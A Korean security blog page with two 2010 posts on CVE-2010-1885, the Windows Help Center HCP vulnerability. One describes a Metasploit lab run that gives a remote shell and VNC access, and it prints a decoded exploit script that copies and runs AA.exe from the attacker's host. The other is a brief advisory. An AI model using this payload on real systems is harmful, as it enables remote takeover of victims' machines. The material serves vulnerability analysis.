'cve-2010-1885'에 해당되는 글 2건

  1. 2010.06.25 Metasploit for Zero Day Vulnerability in Windows Help Center CVE-2010-1885
  2. 2010.06.18 CVE-2010-1885 취약점
0x02 analysis2010. 6. 25. 15:54

2010/06/18 - [0x06 vul info] - CVE-2010-1885 취약점


Metasploit에 exploit이 추가되었습니다.


0x01 Metasploit exploit




클라이언트에서 http://172.17.9.140 으로 접속하면 exploit 코드가 실행되면서 도움말센터가 실행됩니다.
exploit 코드가 동작하면서 AA.exe 파일이 공격자(172.17.9.140)의 9999포트로 연결합니다.



세션을 확인하고 연결해 봤습니다.




연결된 공격대상의 shell(cmd.exe)를 실행하니 잘됩니다. ㅎㅎ




VNC를 실행하니 랜덤한 파일명의 exe 파일이 공격자의 4545포트로 붙는군요..




VNC 정상동작하고 화면제어 잘 됩니다.



0x02 Packet




exploit이 동작하는 순간부터의 패킷입니다.

/ -> /IG48oJvQDE -> /A/rA.html







/A/rA,html에 hcp 취약을 공격하는 코드가 포함되어 있습니다.

iframe 내에 있는 코드를 디코딩해보면 아래와 같은 스크립트가 생성됩니다.

<script defer>eval(unescape('Run(String.fromCharCode('cmd /c echo WScript.CreateObject("WScript.Shell").Run "cmd /c copy \\172.17.9.140\A\AA.exe %TEMP% && %TEMP%\AA.exe",0,false>%TEMP%\xB.vbs|cscript %TEMP%\xB.vbs>nul));'))</script>


공격이 성공한 이후에는 9999 포트로 통신을 합니다.





다른 분석글 링크 몇개 겁니다. 참고하세요~

http://contagiodump.blogspot.com/2010/06/jun-17-win-xp-sp2-sp3-0-day-cve-2010.html
http://blog.trendmicro.com/microsoft-help-center-zero-day-exploits-loose/






이 취약점을 해결하시려면 아래 링크를 참조하세요.

http://support.microsoft.com/kb/2219475


Posted by demantos
0x06 vulnerability2010. 6. 18. 14:16



최근에 발표된 CVE-2010-1885는 윈도우 도움말 센터의 호출구조인 HCP에서 문제가 발생하여
원격에서 코드를 실행할 수 있는 취약점입니다.

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1885
http://seclists.org/fulldisclosure/2010/Jun/205





개인적으로 샘플을 확보하긴 했는데 아직 공개하지 말아달라는 부탁을 받았습니다.
조만간 분석해서 다시 글 올리도록 하겠습니다.

뭐..구글신과 친하신분들이시라면 exploit 구하실 수 있을 듯 합니다. :)





Posted by demantos